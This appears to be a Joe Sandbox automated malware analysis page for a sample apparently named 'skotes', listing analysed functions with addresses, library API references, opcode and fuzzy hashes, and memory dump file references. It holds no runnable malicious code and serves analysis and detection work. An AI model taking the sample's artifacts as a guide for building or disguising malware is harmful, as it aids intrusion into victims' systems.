Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3357457007.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b40000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f0a7be7cdd837fb076e1dbda8a922897946f1a0cf6a22c7433d3ade90dac23b
Instruction ID: ed49ce73efd88b3221d03ad60f6497eb8ec5222bd3b0827d4e721b0728b62c98
Opcode Fuzzy Hash: 1f0a7be7cdd837fb076e1dbda8a922897946f1a0cf6a22c7433d3ade90dac23b
Instruction Fuzzy Hash: A90181E764E112BCB202A1963B18AF66B6CE5DB33033085A7F957C5143F299275E7032

Function 04B40C6A Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3357457007.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b40000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03ecba6300275f605877ae16615320f76fca453c5260ddf10108c81c6ac647b6
Instruction ID: df5a88ecb8c9f2d90d31e019184fa1a8a29c7a96eab3370a88566c7046cbd2fd
Opcode Fuzzy Hash: 03ecba6300275f605877ae16615320f76fca453c5260ddf10108c81c6ac647b6
Instruction Fuzzy Hash: EBF06DEB34E121FD7142A1923B18AF66B2DE0D773033086E7FA07D4506F6992A4E3031

Function 04B40C93 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3357457007.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b40000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8167673ce64f3e644225e5d9b6afac294db24e95158b16c30c10ba93bed4454
Instruction ID: 8a2e5f359aeee5c8b5f0e3126acb0fed2b8ea3751546ce0ec255b0786c740eb8
Opcode Fuzzy Hash: f8167673ce64f3e644225e5d9b6afac294db24e95158b16c30c10ba93bed4454
Instruction Fuzzy Hash: 48F0F8EB24E111BD7102A1D23B19AF6AB2DE1D7730331C5A7F907C0146F6986A5E3031

Non-executed Functions

Function 002A0E13 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 002A0F16
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 002A0F62

Part of subcall function 002A265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 002A2750

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 002A0FCE
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 002A0FEA
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 002A103E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 002A106B
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 002A10C1

Strings

(, xrefs: 002A0F22

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 446a8ec4940bd6fee6b045951267c570f2b407767af6a1baff747aae6d7002c6
Instruction ID: 9e2178e77a7242969e8cf21112b64ddf77298d9f479a8fcef6d34099004e8f9a
Opcode Fuzzy Hash: 446a8ec4940bd6fee6b045951267c570f2b407767af6a1baff747aae6d7002c6
Instruction Fuzzy Hash: ADB16C70A20616EFDB28CF58D9C0B7AB7B5FF45314F14416DE905AB685DB30ADA0CB90

Function 002A1602 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A2CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 002A2D0F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 002A1614

Part of subcall function 002A2E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 002A2E39
Part of subcall function 002A2E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 002A2EA8

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 002A1746
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 002A17A6
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 002A17B2
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 002A17ED
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 002A180E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 002A181A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 002A1823
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 002A183B

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: 5897c9dfb04b4263b2caba7b991e01859536f0ef95c96b0dca36589bbf8deb99
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: 2C817A71E102269FCB18CFA8C980A6DB7FAFF49714F1546ADD445AB701CB70AD62CB84

Function 002AEC48 Relevance: 6.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 002AEC81

Part of subcall function 002A8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 002A8F50

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 002AECE7
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 002AECFF
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 002AED0C

Part of subcall function 002AE7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 002AE7D7
Part of subcall function 002AE7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 002AE86F
Part of subcall function 002AE7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 002AE879
Part of subcall function 002AE7AF: Concurrency::location::_Assign.LIBCMT ref: 002AE8AD
Part of subcall function 002AE7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 002AE8B5

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: f5b4b989f206d1748d2a9f507e3f89fbd7a0a74152495583a24627f8dabef145
Instruction ID: 1de58688c8722bf4ef92874c8a832030a0e9089a57b4b42cb67109719dffb714
Opcode Fuzzy Hash: f5b4b989f206d1748d2a9f507e3f89fbd7a0a74152495583a24627f8dabef145
Instruction Fuzzy Hash: B4519231A21605EBCF14DF60C899BADB775AF45310F1540A9E9067B3A2CF70AE16CFA1

Function 0029CB97 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtFlushProcessWriteBuffers.NTDLL ref: 0029CBAA

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: 2e95a7132718562be156f29ebf75997c5b0daf1988203f7d269a4b89f364218f
Instruction ID: 5ba4755b5e9488da09db07d3716eb3056bddcd924a4ae4425b8793d29a61ea2f
Opcode Fuzzy Hash: 2e95a7132718562be156f29ebf75997c5b0daf1988203f7d269a4b89f364218f
Instruction Fuzzy Hash: 54B09232E2383047CA512B14BC9C69D77589B80B1530A0156D801AB2348A105E824BD8

Function 0029DD91 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a879f4ed5fe8424cec0d7dacb8937000cc72931c401608a6690fa77a58c30d
Instruction ID: 76a00413c98aa6f86e49afcc9b8bdefae900efda7a45e9c322ade6a138b2c5cf
Opcode Fuzzy Hash: c2a879f4ed5fe8424cec0d7dacb8937000cc72931c401608a6690fa77a58c30d
Instruction Fuzzy Hash: 1E51BDB2E20616CBDB25CF58E8D97AAB7F1FB58304F24856AD40AEB750D370A910CF50

Function 0029F028 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 229COMMONLIBRARYCODE

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0029F2BB

Strings

pEvents, xrefs: 0029F2B3

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
